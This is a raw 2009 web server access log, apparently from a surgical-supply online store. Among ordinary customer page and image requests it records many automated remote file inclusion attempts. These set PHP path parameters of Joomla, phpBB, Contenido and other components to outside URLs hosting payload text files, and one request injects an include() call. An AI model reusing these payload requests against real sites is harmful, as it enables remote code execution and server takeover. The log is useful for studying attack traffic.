77.222.40.40 - - [25/May/2009:04:09:08 -0400] "GET /logs/access_log.Q109051800%20%20//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:04:09:13 -0400] "GET /logs/access_log.Q108120400%20%20//index2.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:04:09:13 -0400] "GET /logs/access_log.Q108091400%20%20//index2.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
77.222.40.40 - - [25/May/2009:04:09:14 -0400] "GET /logs/access_log.Q109051800%20%20//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
77.222.40.40 - - [25/May/2009:04:09:20 -0400] "GET /logs/access_log.Q109051800%20%20//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
94.23.200.54 - - [25/May/2009:04:09:29 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/disgore/test.txt??? HTTP/1.1" 404 244 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
94.23.200.54 - - [25/May/2009:04:09:29 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/disgore/test.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
75.126.49.163 - - [25/May/2009:04:09:36 -0400] "GET /logs/access_log.Q108032100///?_SERVER[DOCUMENT_ROOT]=hhttp://www.ghetto.uz/readme.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.811"
123.143.98.5 - - [25/May/2009:04:09:52 -0400] "GET /logs/error_log.Q108090500%20/?sourcedir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
123.143.98.5 - - [25/May/2009:04:09:59 -0400] "GET /logs/error_log.Q108090500%20/?sourcedir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
123.143.98.5 - - [25/May/2009:04:10:00 -0400] "GET /logs/error_log.Q108090500%20/?sourcedir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
66.249.72.114 - - [25/May/2009:04:10:11 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L208806444A01250031BD080+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
75.126.49.163 - - [25/May/2009:04:10:22 -0400] "GET /logs/access_log.Q108021800///?_SERVER[DOCUMENT_ROOT]=hhttp://www.ghetto.uz/readme.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.811"
88.84.128.40 - - [25/May/2009:04:10:25 -0400] "GET /logs/access_log.Q108082500//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
200.93.147.154 - - [25/May/2009:04:10:27 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:04:10:27 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:04:10:29 -0400] "GET /logs/access_log.Q108121400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:04:10:29 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:04:10:30 -0400] "GET /logs/access_log.Q108121400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
88.84.128.40 - - [25/May/2009:04:10:32 -0400] "GET /logs/error_log.Q108050700//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.803"
200.93.147.154 - - [25/May/2009:04:10:32 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:04:10:38 -0400] "GET /logs/access_log.Q108120400//index2.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:04:10:38 -0400] "GET /logs/access_log.Q108091400//index2.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.175.122.228 - - [25/May/2009:04:10:41 -0400] "GET /logs/error_log.Q108122800%20%20/config.php?path_to_root=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.175.122.228 - - [25/May/2009:04:10:41 -0400] "GET /config.php?path_to_root=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.175.122.228 - - [25/May/2009:04:10:41 -0400] "GET /logs/config.php?path_to_root=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
212.33.197.126 - - [25/May/2009:04:10:47 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76103 "http://www.acesurgical.com/trufix_sizes.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:10:52 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
200.93.147.154 - - [25/May/2009:04:10:52 -0400] "GET /logs/access_log.Q108072800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
212.33.197.126 - - [25/May/2009:04:10:53 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:10:53 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:10:54 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:10:54 -0400] "GET /images/cat_dot.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:10:54 -0400] "GET /images/cat_link.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:10:54 -0400] "GET /images/cat_expand.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:10:55 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:10:55 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:10:56 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:10:56 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
200.93.147.154 - - [25/May/2009:04:10:56 -0400] "GET /logs/access_log.Q108072800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
212.33.197.126 - - [25/May/2009:04:10:56 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:10:56 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:10:57 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:10:57 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:10:57 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:10:57 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:10:58 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:11:02 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
216.151.134.36 - - [25/May/2009:04:11:11 -0400] "GET /?_zb_path=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:04:11:11 -0400] "GET /logs/?_zb_path=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
86.39.131.85 - - [25/May/2009:04:11:15 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
86.39.131.85 - - [25/May/2009:04:11:15 -0400] "GET /logs/access_log.Q109021900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
86.39.131.85 - - [25/May/2009:04:11:15 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
212.33.197.126 - - [25/May/2009:04:11:16 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L000B394564310300045D09I+M37+ENG HTTP/1.1" 200 63008 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:11:21 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B394564310300045D09I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:11:21 -0400] "GET /images/space.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B394564310300045D09I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:11:21 -0400] "GET /images/next.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B394564310300045D09I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:11:26 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B394564310300045D09I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:11:38 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L000B394564310300045D09I+M37+ENG HTTP/1.1" 200 51091 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
69.237.82.158 - - [25/May/2009:04:11:42 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
69.237.82.158 - - [25/May/2009:04:11:43 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
212.33.197.126 - - [25/May/2009:04:11:43 -0400] "GET /images/items/0031191_THUMB.JPG HTTP/1.1" 200 3852 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B394564310300045D09I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
216.151.134.36 - - [25/May/2009:04:11:45 -0400] "GET /logs/access_log.Q109051100%20%20/?_zb_path=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
69.237.82.158 - - [25/May/2009:04:11:47 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
69.237.82.158 - - [25/May/2009:04:11:48 -0400] "GET /logs/access_log.Q108091400/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
212.33.197.126 - - [25/May/2009:04:11:53 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L000B39456CE163000D2D09I+WSEQ(S0060):1+OUITEM(A0200):0031191 HTTP/1.1" 200 27010 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
86.39.131.85 - - [25/May/2009:04:11:53 -0400] "GET /logs/access_log.Q108120400%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
212.33.197.126 - - [25/May/2009:04:11:55 -0400] "GET /images/items/0031191_FULL.JPG HTTP/1.1" 200 25492 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L000B39456CE163000D2D09I+WSEQ(S0060):1+OUITEM(A0200):0031191" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
216.246.124.211 - - [25/May/2009:04:12:00 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
216.246.124.211 - - [25/May/2009:04:12:00 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
216.246.124.211 - - [25/May/2009:04:12:00 -0400] "GET /logs/access_log.Q108090100/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
212.33.197.126 - - [25/May/2009:04:12:09 -0400] "GET /images/cat_dot.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:12:09 -0400] "GET /images/cat_link.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:12:10 -0400] "GET /images/cat_expand.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
87.106.7.58 - - [25/May/2009:04:12:14 -0400] "GET /logs/access_log.Q108091400//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
216.119.103.12 - - [25/May/2009:04:12:16 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
216.119.103.12 - - [25/May/2009:04:12:16 -0400] "GET /logs/access_log.Q108091400%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
216.119.103.12 - - [25/May/2009:04:12:16 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
212.33.197.126 - - [25/May/2009:04:12:16 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L000B394564310300045D09I+M37+ENG HTTP/1.1" 200 63149 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
216.119.103.12 - - [25/May/2009:04:12:17 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
216.119.103.12 - - [25/May/2009:04:12:17 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
216.119.103.12 - - [25/May/2009:04:12:17 -0400] "GET /logs/access_log.Q108091400%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
209.59.12.99 - - [25/May/2009:04:12:17 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.33.197.126 - - [25/May/2009:04:12:22 -0400] "GET /images/items/0031070_THUMB.JPG HTTP/1.1" 200 811 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B394564310300045D09I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:12:22 -0400] "GET /images/items/0032264_THUMB.JPG HTTP/1.1" 200 1746 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B394564310300045D09I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
216.119.103.12 - - [25/May/2009:04:12:22 -0400] "GET /logs/access_log.Q109050300%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
212.33.197.126 - - [25/May/2009:04:12:22 -0400] "GET /images/items/0032261_THUMB.JPG HTTP/1.1" 200 1516 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B394564310300045D09I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:12:23 -0400] "GET /images/items/0032165_THUMB.JPG HTTP/1.1" 200 2011 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B394564310300045D09I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:12:24 -0400] "GET /images/items/6471097_THUMB.JPG HTTP/1.1" 200 1351 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B394564310300045D09I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:12:24 -0400] "GET /images/items/0032270_THUMB.JPG HTTP/1.1" 200 1646 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B394564310300045D09I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
85.214.66.22 - - [25/May/2009:04:12:25 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
85.214.66.22 - - [25/May/2009:04:12:25 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
85.214.66.22 - - [25/May/2009:04:12:25 -0400] "GET /logs/access_log.Q108090100/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
212.33.197.126 - - [25/May/2009:04:12:25 -0400] "GET /images/items/0031208_THUMB.JPG HTTP/1.1" 200 1322 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B394564310300045D09I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
216.119.103.12 - - [25/May/2009:04:12:26 -0400] "GET /logs/access_log.Q109050300%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
212.33.197.126 - - [25/May/2009:04:12:26 -0400] "GET /images/next.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B394564310300045D09I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:12:26 -0400] "GET /images/items/0032276_THUMB.JPG HTTP/1.1" 200 1704 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000B394564310300045D09I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
87.106.7.58 - - [25/May/2009:04:12:33 -0400] "GET /logs/access_log.Q108091400//?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
212.33.197.126 - - [25/May/2009:04:12:39 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L000B39456CE163000D2D09I+WSEQ(S0060):1+OUITEM(A0200):0031208 HTTP/1.1" 200 27010 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:12:41 -0400] "GET /images/items/0031208_FULL.JPG HTTP/1.1" 200 5177 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L000B39456CE163000D2D09I+WSEQ(S0060):1+OUITEM(A0200):0031208" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:04:12:50 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L000B39456CE163000D2D09I+WSEQ(S0060):1+OUITEM(A0200):6471097 HTTP/1.1" 200 27010 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
